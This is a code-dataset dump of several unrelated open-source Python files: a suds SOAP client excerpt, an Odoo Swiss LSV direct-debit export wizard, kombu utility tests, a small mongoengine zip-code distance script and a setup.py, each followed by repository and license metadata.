binding = self.method.binding.input
attributes = kwargs.get('attributes', None)
if attributes:
del kwargs['attributes']
soapenv = binding.get_message(self.method, args, kwargs, attributes)
timer.stop()
metrics.log.debug(
"message for '%s' created: %s",
self.method.name,
timer)
timer.start()
result = self.send(soapenv)
timer.stop()
metrics.log.debug(
"method '%s' invoked: %s",
self.method.name,
timer)
return result
def send(self, soapenv):
"""
Send soap message.
@param soapenv: A soap envelope to send.
@type soapenv: L{Document}
@return: The reply to the sent message.
@rtype: I{builtin} or I{subclass of} L{Object}
"""
result = None
location = self.location()
binding = self.method.binding.input
transport = self.options.transport
retxml = self.options.retxml
nosend = self.options.nosend
prettyxml = self.options.prettyxml
timer = metrics.Timer()
log.debug('sending to (%s)\nmessage:\n%s', location, soapenv)
try:
self.last_sent(soapenv)
plugins = PluginContainer(self.options.plugins)
plugins.message.marshalled(envelope=soapenv.root())
if prettyxml:
soapenv = soapenv.str()
else:
soapenv = soapenv.plain()
soapenv = soapenv.encode('utf-8')
ctx = plugins.message.sending(envelope=soapenv)
soapenv = ctx.envelope
if nosend:
return RequestContext(self, binding, soapenv)
request = Request(location, soapenv)
request.headers = self.headers()
timer.start()
reply = transport.send(request)
timer.stop()
metrics.log.debug('waited %s on server reply', timer)
ctx = plugins.message.received(reply=reply.message)
reply.message = ctx.reply
if retxml:
result = reply.message
else:
result = self.succeeded(binding, reply.message)
except TransportError, e:
if e.httpcode in (202,204):
result = None
else:
log.error(self.last_sent())
result = self.failed(binding, e)
return result
def headers(self):
"""
        Get http headers for the http/https request.
@return: A dictionary of header/values.
@rtype: dict
"""
action = self.method.soap.action
if isinstance(action, unicode):
action = action.encode('utf-8')
stock = { 'Content-Type' : 'text/xml; charset=utf-8', 'SOAPAction': action }
result = dict(stock, **self.options.headers)
log.debug('headers = %s', result)
return result
def succeeded(self, binding, reply):
"""
Request succeeded, process the reply
@param binding: The binding to be used to process the reply.
@type binding: L{bindings.binding.Binding}
@param reply: The raw reply text.
@type reply: str
@return: The method result.
@rtype: I{builtin}, L{Object}
        @raise WebFault: On server-side fault.
"""
log.debug('http succeeded:\n%s', reply)
plugins = PluginContainer(self.options.plugins)
if len(reply) > 0:
reply, result = binding.get_reply(self.method, reply)
self.last_received(reply)
else:
result = None
ctx = plugins.message.unmarshalled(reply=result)
result = ctx.reply
if self.options.faults:
return result
else:
return (200, result)
def failed(self, binding, error):
"""
Request failed, process reply based on reason
@param binding: The binding to be used to process the reply.
@type binding: L{suds.bindings.binding.Binding}
@param error: The http error message
@type error: L{transport.TransportError}
"""
status, reason = (error.httpcode, tostr(error))
reply = error.fp.read()
log.debug('http failed:\n%s', reply)
if status == 500:
if len(reply) > 0:
r, p = binding.get_fault(reply)
self.last_received(r)
return (status, p)
else:
return (status, None)
if self.options.faults:
raise Exception((status, reason))
else:
return (status, None)
def location(self):
p = Unskin(self.options)
return p.get('location', self.method.location)
def last_sent(self, d=None):
key = 'tx'
messages = self.client.messages
if d is None:
return messages.get(key)
else:
messages[key] = d
def last_received(self, d=None):
key = 'rx'
messages = self.client.messages
if d is None:
return messages.get(key)
else:
messages[key] = d
class SimClient(SoapClient):
"""
Loopback client used for message/reply simulation.
"""
injkey = '__inject'
@classmethod
def simulation(cls, kwargs):
""" get whether loopback has been specified in the I{kwargs}. """
return kwargs.has_key(SimClient.injkey)
def invoke(self, args, kwargs):
"""
Send the required soap message to invoke the specified method
@param args: A list of args for the method invoked.
@type args: list
@param kwargs: Named (keyword) args for the method invoked.
@type kwargs: dict
@return: The result of the method invocation.
@rtype: I{builtin} or I{subclass of} L{Object}
"""
simulation = kwargs[self.injkey]
msg = simulation.get('msg')
reply = simulation.get('reply')
fault = simulation.get('fault')
if msg is None:
if reply is not None:
return self.__reply(reply, args, kwargs)
if fault is not None:
return self.__fault(fault)
raise Exception('(reply|fault) expected when msg=None')
sax = Parser()
msg = sax.parse(string=msg)
return self.send(msg)
def __reply(self, reply, args, kwargs):
""" simulate the reply """
binding = self.method.binding.input
msg = binding.get_message(self.method, args, kwargs)
log.debug('inject (simulated) send message:\n%s', msg)
binding = self.method.binding.output
return self.succeeded(binding, reply)
def __fault(self, reply):
""" simulate the (fault) reply """
binding = self.method.binding.output
if self.options.faults:
r, p = binding.get_fault(reply)
self.last_received(r)
return (500, p)
else:
return (500, None)
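# Usage sketch: passing the ``__inject`` keyword routes the call through
# SimClient, so a canned reply (or fault) is processed without any network
# round trip. The method name is a placeholder.
def _example_simulated_call(client, canned_reply):
    return client.service.someMethod(__inject={'reply': canned_reply})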
class RequestContext:
"""
A request context.
    Returned when the I{nosend} option is specified.
@ivar client: The suds client.
@type client: L{Client}
@ivar binding: The binding for this request.
@type binding: I{Binding}
@ivar envelope: The request soap envelope.
@type envelope: str
"""
def __init__(self, client, binding, envelope):
"""
@param client: The suds client.
@type client: L{Client}
@param binding: The binding for this request.
@type binding: I{Binding}
@param envelope: The request soap envelope.
@type envelope: str
"""
self.client = client
self.binding = binding
self.envelope = envelope
def succeeded(self, reply):
"""
Re-entry for processing a successful reply.
@param reply: The reply soap envelope.
@type reply: str
@return: The returned value for the invoked method.
@rtype: object
"""
options = self.client.options
plugins = PluginContainer(options.plugins)
ctx = plugins.message.received(reply=reply)
reply = ctx.reply
return self.client.succeeded(self.binding, reply)
def failed(self, error):
"""
Re-entry for processing a failure reply.
@param error: The error returned by the transport.
@type error: A suds I{TransportError}.
"""
return self.client.failed(self.binding, error)
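# Usage sketch for the I{nosend} option: the call returns a RequestContext
# instead of performing I/O; the prepared envelope can be transmitted by
# other means and the raw reply fed back through succeeded()/failed().
# The method name is a placeholder.
def _example_nosend(client):
    client.set_options(nosend=True)
    context = client.service.someMethod()
    return context.envelope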
| prezi/prezi-suds | suds/client.py | Python | lgpl-3.0 | 28,017 | 0.002498 |
##############################################################################
#
# Swiss localization Direct Debit module for OpenERP
# Copyright (C) 2014 Compassion (http://www.compassion.ch)
# @author: Cyril Sester <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import base64
import collections
from openerp import models, fields, api, _, netsvc, exceptions
from datetime import date, datetime, timedelta
from openerp.tools import mod10r, DEFAULT_SERVER_DATE_FORMAT
import logging
logger = logging.getLogger(__name__)
class lsv_export_wizard(models.TransientModel):
''' LSV file generation wizard. This wizard is called
when the "make payment" button on a direct debit order
with payment type "LSV" is pressed
'''
_name = 'lsv.export.wizard'
_description = 'Export LSV Direct Debit File'
treatment_type = fields.Selection(
[('P', _('Production')), ('T', _('Test'))],
_('Treatment type'),
required=True,
default='T' # FIXME for release
)
currency = fields.Selection(
[('CHF', 'CHF'), ('EUR', 'EUR')],
_('Currency'),
required=True,
default='CHF'
)
banking_export_ch_dd_id = fields.Many2one(
'banking.export.ch.dd',
_('LSV file'),
readonly=True
)
file = fields.Binary(
string=_('File'),
related='banking_export_ch_dd_id.file'
)
filename = fields.Char(
string=_('Filename'),
related='banking_export_ch_dd_id.filename',
size=256,
readonly=True
)
nb_transactions = fields.Integer(
string=_('Number of Transactions'),
related='banking_export_ch_dd_id.nb_transactions'
)
total_amount = fields.Float(
string=_('Total Amount'),
related='banking_export_ch_dd_id.total_amount'
)
state = fields.Selection(
[('create', _('Create')), ('finish', _('Finish'))],
_('State'),
readonly=True,
default='create'
)
@api.multi
def generate_lsv_file(self):
''' Generate direct debit export object including the lsv file
content. Called by generate button.
'''
self.ensure_one()
payment_order_obj = self.env['payment.order']
payment_line_obj = self.env['payment.line']
active_ids = self.env.context.get('active_ids', [])
if not active_ids:
raise exceptions.ValidationError(_('No payment order selected'))
payment_order_ids = payment_order_obj.browse(active_ids)
# common properties for all lines
properties = self._setup_properties(payment_order_ids[0])
total_amount = 0.0
lsv_lines = []
for payment_order in payment_order_ids:
total_amount = total_amount + payment_order.total
ben_bank_id = payment_order.mode.bank_id
clean_acc_number = ben_bank_id.acc_number.replace(' ', '')
clean_acc_number = clean_acc_number.replace('-', '')
ben_address = self._get_account_address(ben_bank_id)
properties.update({
'ben_address': ben_address,
'ben_iban': clean_acc_number,
'ben_clearing': self._get_clearing(payment_order.mode.bank_id),
})
if not self._is_ch_li_iban(properties.get('ben_iban')):
raise exceptions.ValidationError(
_('Ben IBAN is not a correct CH or LI IBAN (%s given)') %
properties.get('ben_iban')
)
order_by = ''
if payment_order.date_prefered == 'due':
order_by = 'account_move_line.date_maturity ASC, '
order_by += 'payment_line.bank_id'
# A direct db query is used because order parameter in model.search
# doesn't support function fields
self.env.cr.execute(
'SELECT payment_line.id FROM payment_line, account_move_line '
'WHERE payment_line.move_line_id = account_move_line.id '
'AND payment_line.order_id = %s '
'ORDER BY ' + order_by, (payment_order.id,))
sorted_line_ids = [row[0] for row in self.env.cr.fetchall()]
payment_lines = payment_line_obj.browse(sorted_line_ids)
for line in payment_lines:
if not line.mandate_id or not line.mandate_id.state == "valid":
raise exceptions.ValidationError(
_('Line with ref %s has no associated valid mandate') %
line.name
)
# Payment line is associated to generated line to make
# customizing easier.
lsv_lines.append((line, self._generate_debit_line(
line, properties, payment_order)))
properties.update({'seq_nb': properties['seq_nb'] + 1})
lsv_lines.append((None, self._generate_total_line(properties,
total_amount)))
lsv_lines = self._customize_lines(lsv_lines, properties)
file_content = ''.join(lsv_lines) # Concatenate all lines
file_content = ''.join(
[ch if ord(ch) < 128 else '?' for ch in file_content])
export_id = self._create_lsv_export(active_ids,
total_amount,
properties,
file_content)
self.write({'banking_export_ch_dd_id': export_id.id,
'state': 'finish'})
action = {
'name': 'Generated File',
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'form,tree',
'res_model': self._name,
'res_id': self.id,
'target': 'new',
}
return action
@api.model
def _generate_debit_line(self, line, properties, payment_order):
''' Convert each payment_line to lsv debit line '''
deb_acc_number = line.bank_id.acc_number
deb_acc_number = deb_acc_number.replace(' ', '').replace('-', '')
if line.bank_id.state == 'iban' and not self._is_ch_li_iban(
deb_acc_number):
raise exceptions.ValidationError(
_('Line with ref %s has not a correct CH or LI IBAN'
'(%s given)') % (line.name, deb_acc_number)
)
vals = collections.OrderedDict()
vals['TA'] = '875'
vals['VNR'] = '0'
vals['VART'] = properties.get('treatment_type', 'P')
vals['GVDAT'] = self._prepare_date(
self._get_treatment_date(payment_order.date_prefered,
line.ml_maturity_date,
payment_order.date_scheduled,
line.name))
vals['BCZP'] = self._complete_line(
self._get_clearing(line.bank_id), 5)
vals['EDAT'] = properties.get('edat')
vals['BCZE'] = self._complete_line(properties.get('ben_clearing'), 5)
vals['ABSID'] = properties.get('lsv_identifier')
vals['ESEQ'] = str(properties.get('seq_nb')).zfill(7)
vals['LSVID'] = properties.get('lsv_identifier')
self._check_currency(line, properties)
vals['WHG'] = properties.get('currency', 'CHF')
self._check_amount(line, properties)
vals['BETR'] = self._format_number(line.amount_currency, 12)
vals['KTOZE'] = self._complete_line(properties.get('ben_iban'), 34)
vals['ADRZE'] = properties.get('ben_address')
vals['KTOZP'] = self._complete_line(deb_acc_number, 34)
vals['ADRZP'] = self._get_account_address(line.bank_id)
vals['MITZP'] = self._complete_line(self._get_communications(line),
140)
ref, ref_type = self._get_ref(line)
vals['REFFL'] = ref_type
vals['REFNR'] = self._complete_line(ref, 27)
if vals['REFFL'] == 'A':
if not properties.get('esr_party_number'):
raise exceptions.ValidationError(
_('Line with ref %s has ESR ref, but no valid '
'ESR party number exists for ben account') %
line.name
)
vals['ESRTN'] = self._complete_line(
properties.get('esr_party_number'),
9)
else:
vals['ESRTN'] = self._complete_line('', 9)
gen_line = ''.join(vals.values())
if len(gen_line) == 588: # Standard 875 line size
return gen_line
else:
raise exceptions.Warning(
_('Generated line for ref %s with size %d is not valid '
'(len should be 588)') %
(line.name, len(gen_line))
)
def _generate_total_line(self, properties, total_amount):
''' Generate total line according to total amount and properties '''
vals = collections.OrderedDict()
vals['TA'] = '890'
vals['VNR'] = '0'
vals['EDAT'] = properties.get('edat')
vals['ABSID'] = properties.get('lsv_identifier')
vals['ESEQ'] = str(properties.get('seq_nb')).zfill(7)
vals['WHG'] = properties.get('currency', 'CHF')
vals['TBETR'] = self._format_number(total_amount, 16)
line = ''.join(vals.values())
if len(line) == 43:
return line
else:
raise exceptions.Warning(
_('Generated total line is not valid (%d instead of 43)') %
len(line)
)
def _create_lsv_export(self, p_o_ids, total_amount,
properties, file_content):
''' Create banking.export.ch.dd object '''
banking_export_ch_dd_obj = self.env['banking.export.ch.dd']
vals = {
'payment_order_ids': [(6, 0, [p_o_id for p_o_id in p_o_ids])],
'total_amount': total_amount,
# Substract 1 for total line
'nb_transactions': properties.get('seq_nb') - 1,
'file': base64.encodestring(file_content),
'type': 'LSV',
}
export_id = banking_export_ch_dd_obj.create(vals)
return export_id
@api.multi
def confirm_export(self):
''' Save the exported LSV file: mark all payments in the file
as 'sent'. Write 'last debit date' on mandate.
'''
self.banking_export_ch_dd_id.write({'state': 'sent'})
wf_service = netsvc.LocalService('workflow')
today_str = datetime.today().strftime(DEFAULT_SERVER_DATE_FORMAT)
for order in self.banking_export_ch_dd_id.payment_order_ids:
wf_service.trg_validate(self.env.uid, 'payment.order',
order.id, 'done', self.env.cr)
mandate_ids = list(set(
[line.mandate_id.id for line in order.line_ids]))
mandates = self.env['account.banking.mandate'].browse(mandate_ids)
mandates.write({'last_debit_date': today_str})
# redirect to generated lsv export
action = {
'name': 'Generated File',
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'form,tree',
'res_model': 'banking.export.ch.dd',
'res_id': self.banking_export_ch_dd_id.id,
'target': 'current',
}
return action
@api.multi
def cancel_export(self):
''' Cancel the export: delete export record '''
self.banking_export_ch_dd_id.unlink()
return {'type': 'ir.actions.act_window_close'}
@api.model
def _customize_lines(self, lsv_lines, properties):
''' Use this if you want to customize the generated lines.
@param lsv_lines: list of tuples with tup[0]=payment line
and tup[1]=generated string.
@return: list of strings.
'''
return [tup[1] for tup in lsv_lines]
##########################
# Tools #
##########################
def _check_amount(self, line, properties):
''' Max allowed amount is CHF 99'999'999.99.
We need to also check EUR values...
'''
if (properties.get('currency') == 'CHF' and
line.amount_currency > 99999999.99) or (
properties.get('currency') == 'EUR' and
line.amount_currency > 99999999.99 / properties.get('rate')):
raise exceptions.ValidationError(
_('Stop kidding... max authorized amount is CHF 99 999 999.99 '
'(%.2f %s given for ref %s)') %
(line.amount_currency, properties.get('currency'), line.name))
elif line.amount_currency <= 0:
raise exceptions.ValidationError(
_('Amount for line with ref %s is negative (%f given)') %
(line.name, line.amount_currency))
def _check_currency(self, line, properties):
''' Check that line currency is equal to lsv export currency '''
        # All currencies have to be the same!
        if line.currency.name != properties.get('currency'):
raise exceptions.ValidationError(
_('Line with ref %s has %s currency and lsv file %s '
'(should be the same)') %
(line.name, line.currency.name, properties.get(
'currency', '')))
def _complete_line(self, string, nb_char):
''' In LSV file each field has a defined length.
This way, lines have to be filled with spaces
'''
if len(string) > nb_char:
return string[:nb_char]
return string.ljust(nb_char)
def _format_number(self, amount, nb_char):
''' Accepted formats are "00000000123,", "0000000123,1"
and "000000123,46".
This function always returns the last format
'''
amount_str = '{:.2f}'.format(amount).replace('.', ',').zfill(nb_char)
return amount_str
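    # Illustration of the formats above (values are arbitrary):
    #   _format_number(123.4, 12) -> '000000123,40'
    #   _format_number(5, 12)     -> '000000005,00'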
def _get_account_address(self, bank_account):
''' Return account address for given bank_account.
First 2 lines are mandatory !
'''
if bank_account.owner_name:
bank_line1 = bank_account.owner_name
else:
raise exceptions.ValidationError(
_('Missing owner name for bank account %s')
% bank_account.acc_number)
bank_line2 = bank_account.street if bank_account.street else ''
bank_line3 = bank_account.zip + ' ' + bank_account.city \
if bank_account.zip and bank_account.city else ''
bank_line4 = bank_account.country_id.name \
if bank_account.country_id else ''
# line2 is empty, we try to fill with something else
if not bank_line2:
if bank_line3:
bank_line2 = bank_line3
bank_line3 = bank_line4
bank_line4 = ''
elif bank_line4:
bank_line2 = bank_line4
bank_line4 = ''
else:
raise exceptions.ValidationError(
_('Missing address for bank account %s')
% bank_account.acc_number)
return (self._complete_line(bank_line1, 35) +
self._complete_line(bank_line2, 35) +
self._complete_line(bank_line3, 35) +
self._complete_line(bank_line4, 35))
def _get_clearing(self, bank_account):
clearing = ''
if bank_account.bank.clearing:
clearing = bank_account.bank.clearing
elif bank_account.state == 'iban':
clean_acc_number = bank_account.acc_number.replace(" ", "")
# Clearing number is always 5 chars and starts at position 5
# (4 in machine-index) in CH-iban
clearing = str(int(clean_acc_number[4:9]))
else:
raise exceptions.ValidationError(
_('Unable to determine clearing number for account %s') %
bank_account.acc_number)
return clearing
def _get_communications(self, line):
''' This method can be overloaded to fit your communication style '''
return ''
def _get_ref(self, payment_line):
if self._is_bvr_ref(payment_line.move_line_id.transaction_ref):
return payment_line.move_line_id.transaction_ref.replace(
' ', '').rjust(27, '0'), 'A'
return '', 'B' # If anyone uses IPI reference, get it here
def _is_bvr_ref(self, ref):
if not ref:
return False # Empty is not valid
clean_ref = ref.replace(' ', '')
if not clean_ref.isdigit() or len(clean_ref) > 27:
return False
clean_ref = clean_ref.rjust(27, '0') # Add zeros to the left
if not clean_ref == mod10r(clean_ref[0:26]):
return False
return True
def _get_treatment_date(self, prefered_type, line_mat_date,
order_sched_date, name):
''' Returns appropriate date according to payment_order and
payment_order_line data.
Raises an error if treatment date is > today+30 or < today-10
'''
requested_date = date.today()
if prefered_type == 'due':
tmp_date = datetime.strptime(
line_mat_date, DEFAULT_SERVER_DATE_FORMAT
).date()
requested_date = tmp_date if tmp_date else requested_date
elif prefered_type == 'fixed':
tmp_date = datetime.strptime(
order_sched_date, DEFAULT_SERVER_DATE_FORMAT
).date()
requested_date = tmp_date if tmp_date else requested_date
if requested_date > date.today() + timedelta(days=30) \
or requested_date < date.today() - timedelta(days=10):
raise exceptions.ValidationError(
_('Incorrect treatment date: %s for line with ref %s')
% (requested_date, name))
return requested_date
def _is_ch_li_iban(self, iban):
''' Check if given iban is valid ch or li iban '''
IBAN_CHAR_MAP = {
"A": "10",
"B": "11",
"C": "12",
"D": "13",
"E": "14",
"F": "15",
"G": "16",
"H": "17",
"I": "18",
"J": "19",
"K": "20",
"L": "21",
"M": "22",
"N": "23",
"O": "24",
"P": "25",
"Q": "26",
"R": "27",
"S": "28",
"T": "29",
"U": "30",
"V": "31",
"W": "32",
"X": "33",
"Y": "34",
"Z": "35"}
        iban_validation_str = self._replace_all(
            iban[4:] + iban[0:4], IBAN_CHAR_MAP)
valid = len(iban) == 21
valid &= iban[0:2].lower() in ['ch', 'li']
valid &= (int(iban_validation_str) % 97) == 1
return valid
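    # Illustration with a commonly published example Swiss IBAN:
    #   _is_ch_li_iban('CH9300762011623852957') -> True
    #   _is_ch_li_iban('CH9300762011623852958') -> False (mod-97 check fails)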
def _prepare_date(self, format_date):
''' Returns date formatted to YYYYMMDD string '''
return format_date.strftime('%Y%m%d')
def _replace_all(self, text, char_map):
''' Replace the char_map in text '''
for k, v in char_map.iteritems():
text = text.replace(k, v)
return text
def _setup_properties(self, payment_order):
''' These properties are the same for all lines of the LSV file '''
if not payment_order.mode.bank_id.lsv_identifier:
raise exceptions.ValidationError(
_('Missing LSV identifier for account %s')
% payment_order.mode.bank_id.acc_number)
currency_obj = self.env['res.currency']
chf_id = currency_obj.search([('name', '=', 'CHF')])
rate = chf_id['rate_silent']
ben_bank_id = payment_order.mode.bank_id
properties = {
'treatment_type': self.treatment_type,
'currency': self.currency,
'seq_nb': 1,
'lsv_identifier': ben_bank_id.lsv_identifier.upper(),
'esr_party_number': ben_bank_id.esr_party_number,
'edat': self._prepare_date(
date.today()),
'rate': rate,
}
return properties
| ndtran/l10n-switzerland | l10n_ch_lsv_dd/wizard/lsv_export_wizard.py | Python | agpl-3.0 | 21,814 | 0 |
from __future__ import absolute_import, unicode_literals
import pickle
from io import StringIO, BytesIO
from kombu import version_info_t
from kombu import utils
from kombu.five import python_2_unicode_compatible
from kombu.utils.text import version_string_as_tuple
from kombu.tests.case import Case, Mock, patch, mock
@python_2_unicode_compatible
class OldString(object):
def __init__(self, value):
self.value = value
def __str__(self):
return self.value
def split(self, *args, **kwargs):
return self.value.split(*args, **kwargs)
def rsplit(self, *args, **kwargs):
return self.value.rsplit(*args, **kwargs)
class test_kombu_module(Case):
def test_dir(self):
import kombu
self.assertTrue(dir(kombu))
class test_utils(Case):
def test_maybe_list(self):
self.assertEqual(utils.maybe_list(None), [])
self.assertEqual(utils.maybe_list(1), [1])
self.assertEqual(utils.maybe_list([1, 2, 3]), [1, 2, 3])
def test_fxrange_no_repeatlast(self):
self.assertEqual(list(utils.fxrange(1.0, 3.0, 1.0)),
[1.0, 2.0, 3.0])
def test_fxrangemax(self):
self.assertEqual(list(utils.fxrangemax(1.0, 3.0, 1.0, 30.0)),
[1.0, 2.0, 3.0, 3.0, 3.0, 3.0,
3.0, 3.0, 3.0, 3.0, 3.0])
self.assertEqual(list(utils.fxrangemax(1.0, None, 1.0, 30.0)),
[1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0])
def test_reprkwargs(self):
self.assertTrue(utils.reprkwargs({'foo': 'bar', 1: 2, 'k': 'v'}))
def test_reprcall(self):
self.assertTrue(
utils.reprcall('add', (2, 2), {'copy': True}),
)
class test_UUID(Case):
def test_uuid4(self):
self.assertNotEqual(utils.uuid4(),
utils.uuid4())
def test_uuid(self):
i1 = utils.uuid()
i2 = utils.uuid()
self.assertIsInstance(i1, str)
self.assertNotEqual(i1, i2)
class MyStringIO(StringIO):
def close(self):
pass
class MyBytesIO(BytesIO):
def close(self):
pass
class test_emergency_dump_state(Case):
@mock.stdouts
def test_dump(self, stdout, stderr):
fh = MyBytesIO()
utils.emergency_dump_state(
{'foo': 'bar'}, open_file=lambda n, m: fh)
self.assertDictEqual(
pickle.loads(fh.getvalue()), {'foo': 'bar'})
self.assertTrue(stderr.getvalue())
self.assertFalse(stdout.getvalue())
@mock.stdouts
def test_dump_second_strategy(self, stdout, stderr):
fh = MyStringIO()
def raise_something(*args, **kwargs):
raise KeyError('foo')
utils.emergency_dump_state(
{'foo': 'bar'},
open_file=lambda n, m: fh, dump=raise_something
)
self.assertIn('foo', fh.getvalue())
self.assertIn('bar', fh.getvalue())
self.assertTrue(stderr.getvalue())
self.assertFalse(stdout.getvalue())
class test_retry_over_time(Case):
def setup(self):
self.index = 0
class Predicate(Exception):
pass
def myfun(self):
if self.index < 9:
raise self.Predicate()
return 42
def errback(self, exc, intervals, retries):
interval = next(intervals)
sleepvals = (None, 2.0, 4.0, 6.0, 8.0, 10.0, 12.0, 14.0, 16.0, 16.0)
self.index += 1
self.assertEqual(interval, sleepvals[self.index])
return interval
@mock.sleepdeprived(module=utils)
def test_simple(self):
prev_count, utils.count = utils.count, Mock()
try:
utils.count.return_value = list(range(1))
x = utils.retry_over_time(self.myfun, self.Predicate,
errback=None, interval_max=14)
self.assertIsNone(x)
utils.count.return_value = list(range(10))
cb = Mock()
x = utils.retry_over_time(self.myfun, self.Predicate,
errback=self.errback, callback=cb,
interval_max=14)
self.assertEqual(x, 42)
self.assertEqual(self.index, 9)
cb.assert_called_with()
finally:
utils.count = prev_count
@mock.sleepdeprived(module=utils)
def test_retry_once(self):
with self.assertRaises(self.Predicate):
utils.retry_over_time(
self.myfun, self.Predicate,
max_retries=1, errback=self.errback, interval_max=14,
)
self.assertEqual(self.index, 1)
# no errback
with self.assertRaises(self.Predicate):
utils.retry_over_time(
self.myfun, self.Predicate,
max_retries=1, errback=None, interval_max=14,
)
@mock.sleepdeprived(module=utils)
def test_retry_always(self):
Predicate = self.Predicate
class Fun(object):
def __init__(self):
self.calls = 0
def __call__(self, *args, **kwargs):
try:
if self.calls >= 10:
return 42
raise Predicate()
finally:
self.calls += 1
fun = Fun()
self.assertEqual(
utils.retry_over_time(
fun, self.Predicate,
max_retries=0, errback=None, interval_max=14,
),
42,
)
self.assertEqual(fun.calls, 11)
class test_cached_property(Case):
def test_deleting(self):
class X(object):
xx = False
@utils.cached_property
def foo(self):
return 42
@foo.deleter # noqa
def foo(self, value):
self.xx = value
x = X()
del(x.foo)
self.assertFalse(x.xx)
x.__dict__['foo'] = 'here'
del(x.foo)
self.assertEqual(x.xx, 'here')
def test_when_access_from_class(self):
class X(object):
xx = None
@utils.cached_property
def foo(self):
return 42
@foo.setter # noqa
def foo(self, value):
self.xx = 10
desc = X.__dict__['foo']
self.assertIs(X.foo, desc)
self.assertIs(desc.__get__(None), desc)
self.assertIs(desc.__set__(None, 1), desc)
self.assertIs(desc.__delete__(None), desc)
self.assertTrue(desc.setter(1))
x = X()
x.foo = 30
self.assertEqual(x.xx, 10)
del(x.foo)
class test_symbol_by_name(Case):
def test_instance_returns_instance(self):
instance = object()
self.assertIs(utils.symbol_by_name(instance), instance)
def test_returns_default(self):
default = object()
self.assertIs(
utils.symbol_by_name('xyz.ryx.qedoa.weq:foz', default=default),
default,
)
def test_no_default(self):
with self.assertRaises(ImportError):
utils.symbol_by_name('xyz.ryx.qedoa.weq:foz')
def test_imp_reraises_ValueError(self):
imp = Mock()
imp.side_effect = ValueError()
with self.assertRaises(ValueError):
utils.symbol_by_name('kombu.Connection', imp=imp)
def test_package(self):
from kombu.entity import Exchange
self.assertIs(
utils.symbol_by_name('.entity:Exchange', package='kombu'),
Exchange,
)
self.assertTrue(utils.symbol_by_name(':Consumer', package='kombu'))
class test_ChannelPromise(Case):
def test_repr(self):
obj = Mock(name='cb')
self.assertIn(
'promise',
repr(utils.ChannelPromise(obj)),
)
obj.assert_not_called()
class test_entrypoints(Case):
@mock.mask_modules('pkg_resources')
def test_without_pkg_resources(self):
self.assertListEqual(list(utils.entrypoints('kombu.test')), [])
@mock.module_exists('pkg_resources')
def test_with_pkg_resources(self):
with patch('pkg_resources.iter_entry_points', create=True) as iterep:
eps = iterep.return_value = [Mock(), Mock()]
self.assertTrue(list(utils.entrypoints('kombu.test')))
iterep.assert_called_with('kombu.test')
eps[0].load.assert_called_with()
eps[1].load.assert_called_with()
class test_shufflecycle(Case):
def test_shuffles(self):
prev_repeat, utils.repeat = utils.repeat, Mock()
try:
utils.repeat.return_value = list(range(10))
values = {'A', 'B', 'C'}
cycle = utils.shufflecycle(values)
seen = set()
            for i in range(10):
                seen.add(next(cycle))
utils.repeat.assert_called_with(None)
self.assertTrue(seen.issubset(values))
with self.assertRaises(StopIteration):
next(cycle)
next(cycle)
finally:
utils.repeat = prev_repeat
class test_version_string_as_tuple(Case):
def test_versions(self):
self.assertTupleEqual(
version_string_as_tuple('3'),
version_info_t(3, 0, 0, '', ''),
)
self.assertTupleEqual(
version_string_as_tuple('3.3'),
version_info_t(3, 3, 0, '', ''),
)
self.assertTupleEqual(
version_string_as_tuple('3.3.1'),
version_info_t(3, 3, 1, '', ''),
)
self.assertTupleEqual(
version_string_as_tuple('3.3.1a3'),
version_info_t(3, 3, 1, 'a3', ''),
)
self.assertTupleEqual(
version_string_as_tuple('3.3.1a3-40c32'),
version_info_t(3, 3, 1, 'a3', '40c32'),
)
self.assertEqual(
version_string_as_tuple('3.3.1.a3.40c32'),
version_info_t(3, 3, 1, 'a3', '40c32'),
)
class test_maybe_fileno(Case):
def test_maybe_fileno(self):
self.assertEqual(utils.maybe_fileno(3), 3)
f = Mock(name='file')
self.assertIs(utils.maybe_fileno(f), f.fileno())
f.fileno.side_effect = ValueError()
self.assertIsNone(utils.maybe_fileno(f))
| Elastica/kombu | kombu/tests/utils/test_utils.py | Python | bsd-3-clause | 10,301 | 0 |
from mongoengine import *
from models.zips import Zips
from geopy import distance
from geopy import Point
connect('scratch', host='mongodb://142.133.150.180/scratch')
# zipins = Zips(zipcode=999999, city="testlocation", loc=[1.0,1.0],pop=12345, state="ZZ").save()
locationList = []
location = {}
distanceList = []
for zip in Zips.objects:
    locationList.append(zip)
for location1 in locationList:
    if location1.city == "BEVERLY HILLS":
        point1 = Point(location1.loc[0], location1.loc[1])
        for location2 in locationList:
            if location1 != location2 and location2.city != "BEVERLY HILLS":
                point2 = Point(location2.loc[0], location2.loc[1])
                if distance.distance(point1, point2) < 5:
                    distanceList.append(location2)
for location in distanceList:
    print(location.city, location.zipcode)
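# Note (an assumption based on geopy's Distance semantics, not stated in this
# script): distance.distance() returns a Distance object whose numeric
# comparisons are in kilometres, so "< 5" above means "within 5 km", e.g.:
#
#   assert distance.distance(Point(34.07, -118.40), Point(34.06, -118.42)).km < 5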
| rainmakeross/python-dataanalysis | app.py | Python | apache-2.0 | 871 | 0.005741 |
from setuptools import setup
license = open('LICENSE.txt').read()
setup(
name='iloveck101',
version='0.5.2',
author='tzangms',
author_email='[email protected]',
packages=['iloveck101'],
url='https://github.com/tzangms/iloveck101',
license=license,
description='Download images from ck101 thread',
test_suite='tests',
long_description=open('README.md').read(),
entry_points = {
'console_scripts': [
'iloveck101 = iloveck101.iloveck101:main',
]
},
install_requires = [
"lxml==3.2.4",
"requests==2.0.1",
"gevent==1.0",
"more-itertools==2.2",
],
)
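# With the console_scripts entry point above, `pip install .` makes an
# `iloveck101` command available on PATH that dispatches to
# iloveck101.iloveck101:main.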
| tzangms/iloveck101 | setup.py | Python | mit | 662 | 0.006042 |
#pylint: disable=C0301, C0103, W0212, W0401
"""
.. module:: pilot
:platform: Unix
:synopsis: RADICAL-Pilot is a distributed Pilot-Job framework.
.. moduleauthor:: Ole Weidner <[email protected]>
"""
